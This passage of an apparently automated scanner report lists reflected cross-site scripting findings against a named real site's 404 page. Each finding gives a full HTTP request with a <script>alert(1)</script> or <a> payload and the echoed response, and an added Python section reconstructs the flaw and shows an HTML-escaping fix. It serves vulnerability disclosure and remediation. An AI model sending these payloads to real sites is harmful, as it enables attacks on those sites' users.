<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images42b3b<script>alert(1)</script>16497a3c6a5/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3607. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b2339<script>alert(1)</script>9016121717b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/ratingb2339<script>alert(1)</script>9016121717b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/ratingb2339<script>alert(1)</script>9016121717b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3608. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 72f62<script>alert(1)</script>41310648cbf was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating/search.php72f62<script>alert(1)</script>41310648cbf?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/search.php72f62<script>alert(1)</script>41310648cbf?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3609. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 96cf7<a>3e70dc8e666 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search96cf7<a>3e70dc8e666&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search96cf7<a>3e70dc8e666&opt=2 was not found on this server.</p>
...[SNIP]...

2.3610. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 68640<a>cba0dd9d426 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/images/rating/search.php?keyword=search...68640<a>cba0dd9d426&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/search.php?keyword=search...68640<a>cba0dd9d426&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3611. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9a210<script>alert(1)</script>960929c2627 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&9a210<script>alert(1)</script>960929c2627=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&9a210<script>alert(1)</script>960929c2627=1 was not found on this server.</p>
...[SNIP]...

2.3612. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7eba9<a>0c92c5e7481 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=27eba9<a>0c92c5e7481 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=27eba9<a>0c92c5e7481 was not found on this server.</p>
...[SNIP]...

2.3613. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 258a0<script>alert(1)</script>1d9f9339b2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail258a0<script>alert(1)</script>1d9f9339b2a/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail258a0<script>alert(1)</script>1d9f9339b2a/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...
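
Every finding on this page against /detail/7/themes/kosmos/... reaches the same sink. The request never reaches search.php (each response is a 404), and it is the site's own 404 page that writes the raw request URI into `<p>The requested URL ... was not found on this server.</p>`. Path segments, parameter names and parameter values are therefore one defect with one fix: encode the URI for an HTML text context before it is placed in the page. The Python below is an added example, not code from the scanned site or from the report. The real 404 handler is not on the page, so `render_404_vulnerable` is an assumed reconstruction that reproduces the bodies shown, `render_404_fixed` is the corrected form, and `classify_reflection` mirrors the report's Certain/Firm distinction (verbatim `<script>alert(1)</script>` versus a harmless `<a>` tag). The probe URIs and payloads are copied from findings 2.3611 to 2.3613.

```python
"""Reflected XSS via the 404 error page: assumed reconstruction and fix.

Added example, not code from the scanned application or from the report.
The real 404 handler is not on the page; render_404_vulnerable() is an
ASSUMED reconstruction that reproduces the response bodies shown above.
Probe URIs and payloads are copied from findings 2.3611 to 2.3613.
"""
import html
import re

# Error-page sentence exactly as it appears in every response on this page.
BODY = '<p>The requested URL {uri} was not found on this server.</p>'


def render_404_vulnerable(request_uri: str) -> str:
    # ASSUMPTION: the raw request URI is interpolated with no encoding.
    # This is the only behaviour consistent with the bodies in the report.
    return BODY.format(uri=request_uri)


def render_404_fixed(request_uri: str) -> str:
    # Corrected form: escape for an HTML text context. html.escape turns
    # < > & " ' into entities, so an injected tag is displayed, not parsed.
    return BODY.format(uri=html.escape(request_uri, quote=True))


# Payload shapes the report distinguishes.
SCRIPT_RE = re.compile(r'<script>alert\(1\)</script>', re.I)
TAG_RE = re.compile(r'<[a-z]', re.I)


def classify_reflection(body: str, payload: str) -> str:
    """Mirror the report's confidence levels for a reflected payload.

    'certain' : the <script>alert(1)</script> payload is in the body verbatim
    'firm'    : a tag such as <a> survives, but no script PoC was proven
    'text'    : the payload is echoed but carries no markup
    'none'    : the payload is absent or HTML-encoded (entities differ)
    """
    if payload not in body:
        return 'none'
    if SCRIPT_RE.search(payload):
        return 'certain'
    if TAG_RE.search(payload):
        return 'firm'
    return 'text'


# Three injection points used against the same sink (copied from the report).
PROBES = {
    'parameter name': (
        '/detail/7/themes/kosmos/images/rating/search.php?keyword=search...'
        '&Submit3=Search&opt=2&9a210<script>alert(1)</script>960929c2627=1',
        '9a210<script>alert(1)</script>960929c2627'),
    'parameter value': (
        '/detail/7/themes/kosmos/images/rating/search.php?keyword=search...'
        '&Submit3=Search&opt=27eba9<a>0c92c5e7481',
        '7eba9<a>0c92c5e7481'),
    'path segment': (
        '/detail258a0<script>alert(1)</script>1d9f9339b2a/7/themes/kosmos/'
        'images/search.php?keyword=search...&Submit3=Search&opt=2',
        '258a0<script>alert(1)</script>1d9f9339b2a'),
}


def triage(render) -> dict:
    """Run every probe through a 404 renderer and classify the reflection."""
    return {name: classify_reflection(render(uri), payload)
            for name, (uri, payload) in PROBES.items()}


if __name__ == '__main__':
    for label, renderer in (('vulnerable', render_404_vulnerable),
                            ('fixed', render_404_fixed)):
        print(label, triage(renderer))
```

One check before treating the Certain results as exploitable from a victim's browser: the scanner put literal `<` and `>` in the request line, which current browsers percent-encode as `%3C` and `%3E`. Confirm whether the handler decodes the URI (or reflects an already-decoded copy) before echoing it; if it reflects the encoded form, the page shows `%3Cscript%3E` as text and the attack needs another route.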

2.3614. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d706d<script>alert(1)</script>09db072977d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7d706d<script>alert(1)</script>09db072977d/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7d706d<script>alert(1)</script>09db072977d/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3615. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eeeba<script>alert(1)</script>e9f7859367 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themeseeeba<script>alert(1)</script>e9f7859367/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themeseeeba<script>alert(1)</script>e9f7859367/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3616. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a43c0<script>alert(1)</script>a46733b6708 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmosa43c0<script>alert(1)</script>a46733b6708/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmosa43c0<script>alert(1)</script>a46733b6708/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3617. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 54dc6<script>alert(1)</script>a76dea6d432 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images54dc6<script>alert(1)</script>a76dea6d432/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images54dc6<script>alert(1)</script>a76dea6d432/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3618. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8c309<script>alert(1)</script>09158c704bc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/search.php8c309<script>alert(1)</script>09158c704bc?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/search.php8c309<script>alert(1)</script>09158c704bc?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3619. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 45ab7<a>032556a199e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search45ab7<a>032556a199e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search45ab7<a>032556a199e&opt=2 was not found on this server.</p>
...[SNIP]...

2.3620. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 809ac<a>bfe575c0d32 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/images/search.php?keyword=search...809ac<a>bfe575c0d32&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/search.php?keyword=search...809ac<a>bfe575c0d32&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3621. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 85e3b<script>alert(1)</script>4b718a5fd79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&85e3b<script>alert(1)</script>4b718a5fd79=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&85e3b<script>alert(1)</script>4b718a5fd79=1 was not found on this server.</p>
...[SNIP]...

2.3622. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cda77<a>5c9383b8238 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2cda77<a>5c9383b8238 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
